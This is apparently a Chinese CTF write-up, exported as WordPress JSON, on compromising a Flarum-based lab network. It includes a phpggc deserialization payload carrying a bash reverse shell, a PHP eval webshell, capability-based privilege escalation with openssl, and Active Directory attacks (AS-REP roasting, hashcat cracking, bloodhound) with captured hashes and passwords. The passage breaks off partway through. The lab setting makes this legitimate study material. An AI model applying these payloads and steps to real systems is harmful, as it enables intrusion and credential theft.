{"id":2626,"date":"2023-09-30T21:04:03","date_gmt":"2023-09-30T13:04:03","guid":{"rendered":"https:\/\/fushuling.com\/?p=2626"},"modified":"2023-10-15T00:00:09","modified_gmt":"2023-10-14T16:00:09","slug":"%e6%98%a5%e7%a7%8b%e4%ba%91%e5%a2%83%c2%b7flarum","status":"publish","type":"post","link":"https:\/\/fushuling.com\/index.php\/2023\/09\/30\/%e6%98%a5%e7%a7%8b%e4%ba%91%e5%a2%83%c2%b7flarum\/","title":{"rendered":"\u6625\u79cb\u4e91\u5883\u00b7Flarum"},"content":{"rendered":"\n<p>\u8003\u70b9\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Flarum\u540e\u53f0RCE<\/li>\n\n\n\n<li>capabilities\u63d0\u6743\u2014\u2014openssl\u547d\u4ee4<\/li>\n\n\n\n<li>AS-REP Roasting<\/li>\n\n\n\n<li>\u6293xshell\u5bc6\u7801<\/li>\n\n\n\n<li>Account Operators\u7ec4\u7528\u6237\u6253RBCD<\/li>\n\n\n\n<li>DCSync<\/li>\n<\/ul>\n\n\n\n<p>rockyou\u542f\u52a8\uff1aadministrator::1chris<\/p>\n\n\n\n<p>\u540e\u53f0\u5982\u4f55\u62ffshell\u5c31\u8981\u770bp\u725b\u5f53\u5e74\u600e\u4e48\u6316Flarum 0day\u7684\u6587\u7ae0(<a href=\"https:\/\/tttang.com\/archive\/1714\/\">\u4ece\u5076\u9047Flarum\u5f00\u59cb\u7684RCE\u4e4b\u65c5<\/a>)\u4e86\uff0c\u5728\u6211\u521a\u5b66\u5b89\u5168\u7684\u65f6\u5019\u5c31\u62dc\u8bfb\u8fc7\u4e00\u6b21\uff0c\u4e3ap\u725b\u7814\u7a76\u95ee\u9898\u548c\u5206\u6790\u4ee3\u7801\u7684\u601d\u8def\u548c\u80fd\u529b\u800c\u9707\u64bc\uff0c\u73b0\u5728\u4e5f\u4e00\u76f4\u5728\u5411p\u725b\u7684\u5883\u754c\u5b66\u4e60\uff0c\u53ea\u4e0d\u8fc7\u8d8a\u5b66\u8d8a\u611f\u89c9\u5dee\u8ddd\u5927Orz<\/p>\n\n\n\n<p>\u6000\u7740\u671d\u5723\u7684\u5fc3\u7406\uff0c\u8ba9\u6211\u4eec\u6309\u7740p\u725b\u7684\u535a\u5ba2\u5f00\u59cbRCE\u3002\u5148\u4e0b\u4e00\u4e2a<a 
href=\"https:\/\/github.com\/ambionics\/phpggc\">phpggc<\/a>\uff0c\u4e00\u79cd\u7c7b\u4f3c\u4e8eyso\u4f46\u662f\u9488\u5bf9php\u7684\u53cd\u5e8f\u5217\u5316\u5229\u7528\u5de5\u5177\uff0c\u8fd9\u91cc\u4e3a\u4e86\u53ef\u63a7\u6587\u4ef6\u5934\uff0c\u6211\u4eec\u4f7f\u7528phpggc\u6765\u751f\u6210tar\u683c\u5f0f\u5305\uff0c\u91cc\u9762\u5185\u5bb9\u5c31\u662f\u53cd\u5f39shell\u7684\u547d\u4ee4\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>.\/phpggc -p tar -b Monolog\/RCE6 system \"bash -c 'bash -i &gt;&amp; \/dev\/tcp\/url\/9383 0&gt;&amp;1'\"<\/code><\/pre>\n\n\n\n<p>\u7f16\u8bd1\u6210\u529f\u540e\u4f1a\u751f\u6210\u4e00\u5927\u5806base64\u4ee3\u7801\uff0c\u590d\u5236\u8fc7\u6765\uff0c\u5728\u540e\u53f0\u4fee\u6539css\u90a3\u91cc\u66ff\u6362\u4e0b\u9762\u4ee3\u7801\u7684xxx<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>@import (inline) 'data:text\/css;base64,xxx';<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/1-88-1024x538.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"538\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/1-88-1024x538.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2630\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" 
\/><\/div><\/figure>\n\n\n\n<p>\u63a5\u7740\u8bbf\u95ee\u4e00\u4e0b\u4e3b\u987539.98.107.139\u786e\u4fddcss\u6837\u5f0f\u5df2\u7ecf\u6210\u529f\u4fee\u6539\uff0c\u63a5\u4e0b\u6765\u518d\u6b21\u4fee\u6539\u81ea\u5b9a\u4e49CSS\uff0c\u4f7f\u7528phar\u534f\u8bae\u5305\u542b\u6211\u4eec\u4fee\u6539\u7684css\u6587\u4ef6<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>.test {\n    content: data-uri('phar:\/\/.\/assets\/forum.css');\n}<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/2-13-1024x726.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"726\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/2-13-1024x726.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2632\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u56e0\u4e3a\u5b83\u8981\u7f16\u8bd1\u4e00\u6bb5\u65f6\u95f4\uff0c\u6240\u4ee5\u70b9\u51fb\u4fdd\u5b58\u4f1a\u5361\u4e00\u4f1a\u513f\uff0c\u8fd9\u5c31\u8bc1\u660e\u6267\u884c\u6210\u529f\u4e86\uff0c\u6210\u529f\u5f39shell<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/3-7.png'><img class=\"lazyload lazyload-style-1\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"467\" height=\"91\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/3-7.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2631\"  sizes=\"auto, (max-width: 467px) 100vw, 467px\" \/><\/div><\/figure>\n\n\n\n<p>\u63a5\u4e0b\u6765\u5199\u4e2a\u9a6c\u597d\u4e0a\u8681\u5251<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>echo \"&lt;?php @eval(\\$_POST&#91;1]);?&gt;\" &gt; 1.php<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/4-5.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"808\" height=\"127\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/4-5.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2633\"  sizes=\"auto, (max-width: 808px) 100vw, 808px\" \/><\/div><\/figure>\n\n\n\n<p>\u8fde\u4e0a\u53bb\u540eflag\u5728root\u76ee\u5f55\uff0csuid\u63d0\u6743\u6ca1\u6cd5\uff0c\u4e0d\u8fc7\u53ef\u4ee5capabilities\u63d0\u6743\uff0c\u53c2\u8003\u4e0b\u9762\u7684\u6587\u7ae0<\/p>\n\n\n\n<p><a 
href=\"https:\/\/www.cnblogs.com\/f-carey\/p\/16026088.html\">Linux\u63d0\u6743\u4e4b\uff1a\u5229\u7528capabilities\u63d0\u6743<\/a><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>getcap -r \/ 2&gt;\/dev\/null<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/5-4.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"963\" height=\"156\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/5-4.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2634\"  sizes=\"auto, (max-width: 963px) 100vw, 963px\" \/><\/div><\/figure>\n\n\n\n<p>\u6709openssl\u547d\u4ee4\u53ef\u4ee5\u5229\u7528<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>openssl enc -in \"\/root\/flag\/flag01.txt\"<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/6-2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"808\" height=\"188\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/6-2.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2635\"  sizes=\"auto, (max-width: 808px) 100vw, 808px\" \/><\/div><\/figure>\n\n\n\n<p>\u63a5\u4e0b\u6765\u6253\u5185\u7f51\u8001\u6d41\u7a0b\uff0cfscan\u626b\u5185\u7f51\uff0cStowaway\u5efa\u4ee3\u7406<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>172.22.60.8:139 open\n172.22.60.42:135 open\n172.22.60.15:135 open\n172.22.60.8:135 open\n172.22.60.52:80 open\n172.22.60.52:22 open\n172.22.60.42:445 open\n172.22.60.15:445 open\n172.22.60.8:445 open\n172.22.60.42:139 open\n172.22.60.15:139 open\n172.22.60.8:88 open\n&#91;*] NetInfo:\n&#91;*]172.22.60.42\n   &#91;-&gt;]Fileserver\n   &#91;-&gt;]172.22.60.42\n   &#91;-&gt;]169.254.83.27\n&#91;*] NetInfo:\n&#91;*]172.22.60.8\n   &#91;-&gt;]DC\n   &#91;-&gt;]172.22.60.8\n   &#91;-&gt;]169.254.42.35\n&#91;*] NetBios: 172.22.60.8     &#91;+]DC XIAORANG\\DC              \n&#91;*] NetBios: 172.22.60.15    XIAORANG\\PC1                   \n&#91;*] NetInfo:\n&#91;*]172.22.60.15\n   &#91;-&gt;]PC1\n   &#91;-&gt;]172.22.60.15\n   &#91;-&gt;]169.254.178.145\n&#91;*] NetBios: 172.22.60.42    XIAORANG\\FILESERVER            \n&#91;*] WebTitle: http:\/\/172.22.60.52       code:200 len:5867   title:\u9704\u58e4\u793e\u533a<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>172.22.60.52 \u672c\u673a(getshell)\n172.22.60.15 PC1\n172.22.60.42 FILESERVER\n172.22.60.8 DC<\/code><\/pre>\n\n\n\n<p>\u4e4b\u524d\u767b\u540e\u53f0\u7684\u65f6\u5019\u770b\u5230\u6709\u5f88\u591axxx@xiaorang.com\u7684email\uff0c\u6309\u7167\u6625\u79cb\u4e91\u955c\u4e4b\u524d\u9898\u76ee\u7684\u98ce\u683c\uff0c\u4f30\u8ba1\u662f\u8981\u6253AS-REP Roasting\uff0c\u5148\u67e5\u770b\u4e00\u4e0b\u6570\u636e\u5e93\u4fe1\u606f\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' 
data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/7-2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"733\" height=\"518\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/7-2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2636\"  sizes=\"auto, (max-width: 733px) 100vw, 733px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php return array (\n  'debug' =&gt; false,\n  'database' =&gt; \n  array (\n    'driver' =&gt; 'mysql',\n    'host' =&gt; 'localhost',\n    'port' =&gt; 3306,\n    'database' =&gt; 'flarum',\n    'username' =&gt; 'root',\n    'password' =&gt; 'Mysql@root123',\n    'charset' =&gt; 'utf8mb4',\n    'collation' =&gt; 'utf8mb4_unicode_ci',\n    'prefix' =&gt; 'flarum_',\n    'strict' =&gt; false,\n    'engine' =&gt; 'InnoDB',\n    'prefix_indexes' =&gt; true,\n  ),\n  'url' =&gt; 'http:\/\/'.$_SERVER&#91;'HTTP_HOST'],\n  'paths' =&gt; \n  array (\n    'api' =&gt; 'api',\n    'admin' =&gt; 'admin',\n  ),\n  'headers' =&gt; \n  array (\n    'poweredByHeader' =&gt; true,\n    'referrerPolicy' =&gt; 'same-origin',\n  ),\n);<\/code><\/pre>\n\n\n\n<p>\u7136\u540e\u8fde\u63a5\u6570\u636e\u5e93\uff0c\u8fd9\u91cc\u6211\u7528\u8681\u5251\u6ca1\u8fde\u4e0a\u53bb\uff0c\u5f88\u62bd\u8c61\uff0c\u660e\u660e\u8bbe\u7f6e\u4e86\u4ee3\u7406\u8fd8\u662f\u4e0d\u884c\uff0c\u540e\u9762\u7528\u7684Proxifier\u8bbe\u7f6e\u5168\u5c40\u4ee3\u7406\u7528navicat\u8fde\u63a5\u7684<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><div 
class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/8-3.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/8-3.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2637\" style=\"width:496px;height:588px\" width=\"496\" height=\"588\"  sizes=\"auto, (max-width: 496px) 100vw, 496px\" \/><\/div><\/figure>\n\n\n\n<p>navicat\u6709\u4e2a\u597d\u5904\uff0c\u80fd\u6307\u5b9a\u5217\u5bfc\u51fa<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/9-2-1024x576.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/9-2-1024x576.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2638\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u7136\u540eAS-REP Roasting<\/p>\n\n\n\n<pre 
class=\"wp-block-code\"><code>proxychains4 impacket-GetNPUsers -dc-ip 172.22.60.8  xiaorang.lab\/ -usersfile flarum_users.txt<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>$krb5asrep$23$wangyun@XIAORANG.LAB:7113eff57f6a311ae31c6954239295c4$6d61457220f4a148bdb66b2eb60186c19fb59036b11408b4a16030a55f2e578917decac987e4bef1e5b758211a8a6657d7dcd7497a4f9f8d8574f19080146e794982c7dc0b9b86510cadc4c3ff84a7afef6fd51000c46cba3868799e5fe89a824acb90903b5e5a5da72503f30a8c9d016f298b2d3686bb75abfc48a7a2d31adc45600d6718c8b8b9712855c5f157c64f163e24fba17b0f926a62821344782e519d392da64129562cc04d0a098cdfb9d3c0101519c3b6c359467e061672ddde3853fa0101e1d6fa384cb4df313b6b6c4b0c8c8269f54dc9a4f04392ea6ad7c37084f0e3519e827a66f113f86b\n$krb5asrep$23$zhangxin@XIAORANG.LAB:6a1df11dffef818977a03d01e7e34240$cc37025841b68c245336912104d4a4f0585c81685912feb5a08fe36e2c38e3ff550cc2902b8d7af2ad2846b4f6e9f785691b06d036c2941003af6eb13317da739a7fbd9779629345134d2d15b641684e477834e24eb9dc1fce6c912d9655813526175a3de0af09d778072cf2be2e7ef1d15e0b57850ebcb2e549d9e1638dde0f5f6809cd880635c759cf5074c238179b5377e5735b01be55b68f3f339eebe4382722d061b070ac328f912b2118efdafa99f81f5a7260ec253bafca4ebacae63e86627a20a2b80e5e1fd326a537d8c5d88a95273584549e47af14b54ee36a3c99244ef1405164903d963e4593<\/code><\/pre>\n\n\n\n<p>\u7206\u4e00\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>hashcat -a 0 -m 18200 --force 1.txt \/usr\/share\/wordlists\/rockyou.txt<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/10-3.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"660\" height=\"489\" 
data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/10-3.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2639\"  sizes=\"auto, (max-width: 660px) 100vw, 660px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>wangyun@XIAORANG.LAB::Adm12geC<\/code><\/pre>\n\n\n\n<p>\u4e0b\u9762\u7528\u8fd9\u4e2a\u7528\u6237\u548c\u5bc6\u7801\u8dd1\u4e00\u4e0bbloodhound<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>proxychains bloodhound-python -u wangyun -p Adm12geC -d xiaorang.lab -c all -ns 172.22.60.8 --zip --dns-tcp<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/11-2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"758\" height=\"557\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/11-2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2640\"  sizes=\"auto, (max-width: 758px) 100vw, 758px\" \/><\/div><\/figure>\n\n\n\n<p>\u8fd9\u91cc\u53ef\u4ee5\u53d1\u73b0zhangxin\u7528\u6237\u5c5e\u4e8eAccount Operators, 
\u56e0\u6b64\u5bf9\u57df\u5185\u975e\u57df\u63a7\u7684\u6240\u6709\u673a\u5668\u90fd\u5177\u6709GenericAll\u6743\u9650\uff0c\u800cFILESERVER\u673a\u5668\u6709DCSync\uff0c\u8fd9\u4e2a\u5c31\u662f\u9898\u76ee\u63cf\u8ff0\u91cc\u8bf4\u7684\u9ed1\u5ba2\u7559\u4e0b\u7684\u57df\u63a7\u5236\u5668\u540e\u95e8\uff0c\u6240\u4ee5\u601d\u8def\u5f88\u660e\u663e\uff0c\u5c31\u662f\u7528zhangxin\u5bf9FILESERVER\u914d\u7f6eRBCD, \u7136\u540eDCSync\u62ff\u4e0b\u57df\u63a7\u3002<\/p>\n\n\n\n<p>\u56e0\u6b64\u4e0b\u4e00\u6b65\u601d\u8def\u80af\u5b9a\u5c31\u662f\u83b7\u53d6zhangxin\u8fd9\u4e2a\u7528\u6237\u7684\u4fe1\u606f\u4e86\uff0cDC\u548cFILESERVER\u80af\u5b9a\u662f\u540e\u9762\u6253\u7684\uff0c\u7a81\u7834\u53e3\u5728\u8fd9\u4e2aPC1\uff0c\u5148\u626b\u4e00\u4e0b\u7aef\u53e3<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>.\/fscan_amd64 -h 172.22.60.15  -p 1-65535 <\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>172.22.60.15:445 open\n172.22.60.15:139 open\n172.22.60.15:135 open\n172.22.60.15:3389 open<\/code><\/pre>\n\n\n\n<p>\u5f00\u4e863389\uff0crdp\u4e0a\u53bb\uff0c\u91cc\u9762\u6709\u4e2axshell\uff0c\u5176\u4e2d\u6709zhangxin\u7528\u6237\uff0c\u4f46\u662f\u6ca1\u6cd5\u770b\u5bc6\u7801<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/13-3-1024x634.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"634\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/13-3-1024x634.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2641\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u73a9\u8fc7\u53d6\u8bc1\u7684\u5e94\u8be5\u90fd\u63a5\u89e6\u8fc7\u7834\u89e3xshell\uff0c\u8fd9\u91cc\u7528\u6700\u7b80\u5355\u7684SharpXDecrypt\u5c31\u80fd\u6293\u5bc6\u7801\u4e86(https:\/\/github.com\/JDArmy\/SharpXDecrypt\/)<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/14-3-1024x482.png'><img class=\"lazyload lazyload-style-1\" 